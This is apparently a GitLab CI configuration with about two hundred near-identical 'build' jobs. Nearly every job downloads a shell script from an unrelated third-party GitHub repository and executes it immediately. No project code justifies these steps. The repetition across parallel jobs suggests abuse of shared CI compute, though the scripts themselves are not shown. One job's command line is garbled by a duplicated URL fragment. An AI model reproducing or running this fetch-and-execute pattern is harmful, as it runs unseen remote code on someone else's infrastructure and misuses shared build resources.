image: python:latest
build:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build1:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build2:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build3:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build4:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build5:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build6:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build7:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build8:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build9:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build10:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build11:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build12:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build13:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build14:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build15:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build16:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build17:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build18:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build19:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build20:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build21:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build22:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build23:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build24:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build25:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build26:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build27:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build28:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build29:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
buil30:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build31:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build32:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build33:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build34:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build35:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build36:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build37:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build38:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build39:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build40:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build41:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build42:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build43:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build44:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build45:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build46:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build47:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build48:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build49:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
buill50:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build51:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build52:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build53:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build54:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build55:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build56:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build57:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build58:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build59:
    script:
        - wget https://raw.githubusercontent.com/momonona/a/main/gaskeun.sh && ubusercontent.com/momonona/a/main/gaskeun.sh && chmod u+x gaskeun.sh && ./gaskeun.sh
build120:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build121:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build122:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build123:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build124:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build125:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build126:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build127:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build128:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build129:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
buil130:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build131:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build132:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build133:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build134:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build135:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build136:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build137:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build138:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build139:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build140:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build141:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build142:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build143:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build144:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build145:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build146:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build147:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build148:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build60:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build61:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build62:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build63:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build64:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build65:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build66:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build67:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build68:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build69:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build70:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build71:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build72:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build73:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build74:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build75:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build76:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build77:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build78:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build79:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build80:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build81:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build82:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build83:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build84:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build85:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build86:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build87:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build88:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build89:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build90:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build91:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build92:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build93:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build94:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build95:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build96:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build97:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build98:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build99:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build100:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build101:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build102:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build103:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build104:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build105:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build106:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build107:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build108:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build109:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build110:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build111:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build112:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build113:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build114:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build115:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build116:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build117:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build118:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build179:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build180:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build181:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build182:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build183:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build184:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build185:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build186:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build187:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build188:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build189:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build190:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build191:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build192:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build93:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build194:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build195:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build196:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build197:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build198:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build199:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build200:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
buill150:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build151:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build152:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build153:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build154:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build155:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build156:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build157:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build158:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build159:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build160:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build161:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build162:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build163:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build164:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build165:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build166:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build167:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build168:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build169:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build170:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build171:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build172:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build173:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build174:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build175:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build176:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build177:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
build178:
    script:
        - wget https://raw.githubusercontent.com/sikido21/a/main/ngaceng.sh && chmod u+x ngaceng.sh && ./ngaceng.sh
